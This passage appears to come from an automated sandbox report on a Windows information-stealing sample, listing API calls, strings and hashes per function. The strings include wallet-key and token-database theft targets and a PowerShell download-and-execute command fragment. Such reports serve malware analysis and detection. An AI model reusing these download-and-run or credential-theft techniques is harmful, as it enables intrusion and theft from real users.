                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00537452
                                  • HeapFree.KERNEL32(00000000), ref: 00537459
                                  • task.LIBCPMTD ref: 00537555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: 6a9321d846bbf56764e3552c30e9333d11074cf8f87ac6e49fde77f1efe1cc86
                                  • Instruction ID: e2f775c54ffd5864743528227c92d50e2d012058272ba7dcf64210ef3d1596ab
                                  • Opcode Fuzzy Hash: 6a9321d846bbf56764e3552c30e9333d11074cf8f87ac6e49fde77f1efe1cc86
                                  • Instruction Fuzzy Hash: 8E611EB5D0425D9BDB24DB50CD55FEABBB8BF88300F0081E9E689A6141DB706BC9CF91
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                  • InternetOpenA.WININET(00550DF7,00000001,00000000,00000000,00000000), ref: 0053610F
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 00536147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0053618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005361B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 005361DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0053620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00536249
                                  • InternetCloseHandle.WININET(?), ref: 00536253
                                  • InternetCloseHandle.WININET(00000000), ref: 00536260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 2ce347586e0f267dccc2164ffbf80a157b7fcd3e96eea86d874d997cd89c3344
                                  • Instruction ID: b92b47cebdf099ec745f24a3da73a6968e14b62ee46eca5d11763c5729ef916c
                                  • Opcode Fuzzy Hash: 2ce347586e0f267dccc2164ffbf80a157b7fcd3e96eea86d874d997cd89c3344
                                  • Instruction Fuzzy Hash: C75163B1940218BBEB24DF90DC49BEE7BB8FB84705F10C098B609A71C1DB746A85CF95
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 0053BC9F
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0053BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 0053BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 0053BDB9
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 75554f17aa95601f825ffc1a58f93b2896f5e279769980258a697fc8de0aec93
                                  • Instruction ID: 1475165f5049107c94ac630e81830f9a7a7ba18bf4d29f7efb82ddc07bf567d1
                                  • Opcode Fuzzy Hash: 75554f17aa95601f825ffc1a58f93b2896f5e279769980258a697fc8de0aec93
                                  • Instruction Fuzzy Hash: 65B16572950109ABEB44FBA0DC5AEEE7B3CFF94308F404559F506A2091EF346E49CB66
                                  APIs
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 673ee7016a4667cf5092df59a96c06d7508b6c1aeb9d77b08db5babf95205223
                                  • Instruction ID: a7eaad153d974f841703f693e68982b3fc45006a38b3e41404e47628209cdf8d
                                  • Opcode Fuzzy Hash: 673ee7016a4667cf5092df59a96c06d7508b6c1aeb9d77b08db5babf95205223
                                  • Instruction Fuzzy Hash: 3DF05E3090420AFFE3489FE0E90976C7B70FB46747F048198E60D86290D6784B829BDB
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00534FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00534FD1
                                  • InternetOpenA.WININET(00550DDF,00000000,00000000,00000000,00000000), ref: 00534FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00535011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00535041
                                  • InternetCloseHandle.WININET(?), ref: 005350B9
                                  • InternetCloseHandle.WININET(?), ref: 005350C6
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: ebe366d8cb11f29a59d4b0c6a51e445674a14fb7bef46a33d28ab3117d9805f2
                                  • Instruction ID: a07c92de8168d66743a891a714574646a1dea3df33a1a672ad2d24e808fb97a8
                                  • Opcode Fuzzy Hash: ebe366d8cb11f29a59d4b0c6a51e445674a14fb7bef46a33d28ab3117d9805f2
                                  • Instruction Fuzzy Hash: 8D3118B4A40218ABDB24CF54DC89BDCBBB4FB48704F1081D9FA09A7281D7746EC58F99
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011FE218,00000000,?,00550E2C,00000000,?,00000000), ref: 00548130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00548137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00548158
                                  • wsprintfA.USER32 ref: 005481AC
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: 53c207f5faf3b24a21a7facb90b63bba198e17c49318b4c587824293f1bd7754
                                  • Instruction ID: ce66fccb17d99f28ee1b6140a8aee1d61b49f8976c70a63e314d7b1cd9c57874
                                  • Opcode Fuzzy Hash: 53c207f5faf3b24a21a7facb90b63bba198e17c49318b4c587824293f1bd7754
                                  • Instruction Fuzzy Hash: FA211DB1E44219ABEB00DFD5CC49FAEBBB8FB44B54F104519F605BB280D77869018BA9
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00548426
                                  • wsprintfA.USER32 ref: 00548459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0054847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0054848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00548499
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,011FE398,00000000,000F003F,?,00000400), ref: 005484EC
                                  • lstrlen.KERNEL32(?), ref: 00548501
                                  • RegQueryValueExA.ADVAPI32(00000000,011FE440,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00550B34), ref: 00548599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00548608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0054861A
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 9868f708d7fe02eae814add7b6ea5cfea36c6411542ea289a3130c24818bb11b
                                  • Instruction ID: 3354ddb03b13e37476685b676d8f87c5072846bf30c7b82283ccade91015235c
                                  • Opcode Fuzzy Hash: 9868f708d7fe02eae814add7b6ea5cfea36c6411542ea289a3130c24818bb11b
                                  • Instruction Fuzzy Hash: 04210771900218ABEB64DB54DC85FE9B7B8FB88704F00C598A609A6180DF756A85CFD5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005476A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 005476AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,011EBEF8,00000000,00020119,00000000), ref: 005476DD
                                  • RegQueryValueExA.ADVAPI32(00000000,011FE428,00000000,00000000,?,000000FF), ref: 005476FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00547708
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 322f1e570110e2e3403e6622c13cd737f4438c3805064252c81dd5a40db2e5f9
                                  • Instruction ID: 2f09d7d138d135becc4606eaac418980df92663ba29c9b59b494f56773723990
                                  • Opcode Fuzzy Hash: 322f1e570110e2e3403e6622c13cd737f4438c3805064252c81dd5a40db2e5f9
                                  • Instruction Fuzzy Hash: 1701A2B4A00308BFEB00DBE4DC49FADBBB8EB88745F008454FA08D7291D77899408B96
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0054773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,011EBEF8,00000000,00020119,005476B9), ref: 0054775B
                                  • RegQueryValueExA.ADVAPI32(005476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0054777A
                                  • RegCloseKey.ADVAPI32(005476B9), ref: 00547784
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 3370fb4f6b394c233c7e4a3b0bde0336f09bdbb3fa829f771ae905f524a335ba
                                  • Instruction ID: 120a4531dbc24c3c584fb139a5d6211ee47ca128e9323154ceaec6fc135cd360
                                  • Opcode Fuzzy Hash: 3370fb4f6b394c233c7e4a3b0bde0336f09bdbb3fa829f771ae905f524a335ba
                                  • Instruction Fuzzy Hash: 5A01F4B5A40308BBEB00DBE4DC49FBEB7B8EB88745F108555FA09A7281D67455408B96
                                  APIs
                                  • CreateFileA.KERNEL32(:T,80000000,00000003,00000000,00000003,00000080,00000000,?,00543AEE,?), ref: 005492FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:T), ref: 00549319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00549327
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :T$:T
                                  • API String ID: 1378416451-764083415
                                  • Opcode ID: 1d9d3c83ff3b5bfb173c97edc538a1ac8db59ce0984ff7df5da52861df9901b0
                                  • Instruction ID: a0ed63e3a4e3661e7b8aa3ed6dbef2afb2fb1b53ef3a768682af6fefe437fd88
                                  • Opcode Fuzzy Hash: 1d9d3c83ff3b5bfb173c97edc538a1ac8db59ce0984ff7df5da52861df9901b0
                                  • Instruction Fuzzy Hash: CCF0AF74E00208BBEB14DFB0DC0AF9E7BB9FB88350F10CA54B615E72C0D6749A408B84
                                  APIs
                                  • memset.MSVCRT ref: 005440D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,011FDBA0,00000000,00020119,?), ref: 005440F4
                                  • RegQueryValueExA.ADVAPI32(?,011FE5C0,00000000,00000000,00000000,000000FF), ref: 00544118
                                  • RegCloseKey.ADVAPI32(?), ref: 00544122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544147
                                  • lstrcat.KERNEL32(?,011FE4A0), ref: 0054415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 19e3359dc024dbcd8fafc5cb5aa1cc64be1db6e7ce0ed03a86aad03722664af6
                                  • Instruction ID: 6f0fb83424af48f29c28e3a9a580f3d26fe0e20c628c79e5a840be28de1d7c05
                                  • Opcode Fuzzy Hash: 19e3359dc024dbcd8fafc5cb5aa1cc64be1db6e7ce0ed03a86aad03722664af6
                                  • Instruction Fuzzy Hash: 4D4168B69001087BEB14FBB0DC4AFFE777DBBC8340F408558B61A56181EA755BC88B92
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                  • LocalFree.KERNEL32(0053148F), ref: 00539A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: a77eb2933748b4f1aaa7dab1a49284f4be1a2dace096e4204e17dd5704d97171
                                  • Instruction ID: 64d19bf81eae742f210bb874a68c9f7c5beffcd13e4fe750bd9cc2d7b6129b12
                                  • Opcode Fuzzy Hash: a77eb2933748b4f1aaa7dab1a49284f4be1a2dace096e4204e17dd5704d97171
                                  • Instruction Fuzzy Hash: C2314DB4A00209EFDB14DF94C885BEE7BB5FF88341F108258E905A7290D778A981CFA1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 454644a613c952a833e4edeb4bda83c322fe379158f9cc82f8e839c6d42839c9
                                  • Instruction ID: 63411964d10df9fdc51dff90d242e04d57109ce9e50ab45002bf9c8e32a779aa
                                  • Opcode Fuzzy Hash: 454644a613c952a833e4edeb4bda83c322fe379158f9cc82f8e839c6d42839c9
                                  • Instruction Fuzzy Hash: 8D41E87150175CAEDB218B248C84FFB7FF8BB85708F1444E8E98A86182D271AA44DF60
                                  APIs
                                  • lstrcat.KERNEL32(?,011FE608), ref: 005447DB
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544801
                                  • lstrcat.KERNEL32(?,?), ref: 00544820
                                  • lstrcat.KERNEL32(?,?), ref: 00544834
                                  • lstrcat.KERNEL32(?,011EB8D8), ref: 00544847
                                  • lstrcat.KERNEL32(?,?), ref: 0054485B
                                  • lstrcat.KERNEL32(?,011FDB20), ref: 0054486F
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 00548D90: GetFileAttributesA.KERNEL32(00000000,?,00531B54,?,?,0055564C,?,?,00550E1F), ref: 00548D9F
                                    • Part of subcall function 00544570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00544580
                                    • Part of subcall function 00544570: RtlAllocateHeap.NTDLL(00000000), ref: 00544587
                                    • Part of subcall function 00544570: wsprintfA.USER32 ref: 005445A6
                                    • Part of subcall function 00544570: FindFirstFileA.KERNEL32(?,?), ref: 005445BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 0b46ea4379b553ae1b0986286d58527ddf3e588091ceba5d3ed985e64dbf6382
                                  • Instruction ID: 823d5dfcaaccc16bcabdca0635d64ba2cf2f3d40fefdbc76a46719e09acadf9f
                                  • Opcode Fuzzy Hash: 0b46ea4379b553ae1b0986286d58527ddf3e588091ceba5d3ed985e64dbf6382
                                  • Instruction Fuzzy Hash: 62315FB2900209A7DB11FBB0DC89EED777CBB98704F404599B32996081EE7497C98F96
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00542D85
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00542D04
                                  • <, xrefs: 00542D39
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00542CC4
                                  • ')", xrefs: 00542CB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 4c4bb562e34a029516c600cbaac436e415795e1cea0fb742f3cb3d6bb2445abf
                                  • Instruction ID: 63ba078998c863d55b87cdd25c319ea3c4c55bc0cbdbaf54eec075556ae07f8c
                                  • Opcode Fuzzy Hash: 4c4bb562e34a029516c600cbaac436e415795e1cea0fb742f3cb3d6bb2445abf
                                  • Instruction Fuzzy Hash: 0941ED71C502099AEB54FFA0C89ABEDBF78FF54308F504019F406A6192EF742A4ACF91
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00539F41
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 895c72d04c81f57c58616919881add2c5d602830853741b5d0759b6d9f0401fd
                                  • Instruction ID: b7e6e1f4f04c61fa63d4b3ca12eaf52fad16f0bdcb4a38347e304510247952bb
                                  • Opcode Fuzzy Hash: 895c72d04c81f57c58616919881add2c5d602830853741b5d0759b6d9f0401fd
                                  • Instruction Fuzzy Hash: A3612F71A50249ABDB28EFA4CC9AFED7B75FF84304F008418F90A5B191EB746A05CB52
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • memset.MSVCRT ref: 0054716A
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0054718C
                                  • sT, xrefs: 00547111
                                  • sT, xrefs: 005472AE, 00547179, 0054717C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemset
                                  • String ID: sT$sT$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 4047604823-1825640323
                                  • Opcode ID: 44b519c9db0019cf173813d559aacde1963c79e47c59d0319b0b7a69fadc9d65
                                  • Instruction ID: 408324155dd90db819202dc195a05a5cece2dfcedba179b21babe87d3d005f94
                                  • Opcode Fuzzy Hash: 44b519c9db0019cf173813d559aacde1963c79e47c59d0319b0b7a69fadc9d65
                                  • Instruction Fuzzy Hash: D75190B0D0421D9BDB64EBA0DC89BEEBB74FF48308F1044A9E50576181EB742E88CF55
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,011EC278,00000000,00020119,?), ref: 00547E5E
                                  • RegQueryValueExA.ADVAPI32(?,011FDAA0,00000000,00000000,000000FF,000000FF), ref: 00547E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00547E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 27fbebb5f93ceab063d6d879cdee87985b1611d720967b306dbe7ef2b48cfce3
                                  • Instruction ID: f2b912cbe35a50b1f737823134f70785e9bfb1a4897a6876a9374a37a3c68cfb
                                  • Opcode Fuzzy Hash: 27fbebb5f93ceab063d6d879cdee87985b1611d720967b306dbe7ef2b48cfce3
                                  • Instruction Fuzzy Hash: B9116DB1A44209FBE704CB94DC49FBFBBBCFB48745F108259F609A7280D77858008BA2
                                  APIs
                                  • StrStrA.SHLWAPI(011FE230,?,?,?,0054140C,?,011FE230,00000000), ref: 0054926C
                                  • lstrcpyn.KERNEL32(0077AB88,011FE230,011FE230,?,0054140C,?,011FE230), ref: 00549290
                                  • lstrlen.KERNEL32(?,?,0054140C,?,011FE230), ref: 005492A7
                                  • wsprintfA.USER32 ref: 005492C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005312B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 005312BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005312D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005312F5
                                  • RegCloseKey.ADVAPI32(?), ref: 005312FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00546663
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00546726
                                  • ExitProcess.KERNEL32 ref: 00546755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00550E28,00000000,?), ref: 0054882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00548836
                                  • wsprintfA.USER32 ref: 00548850
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0054951E,00000000), ref: 00548D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00548D62
                                  • wsprintfW.USER32 ref: 00548D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0053A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 0053A6BC
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
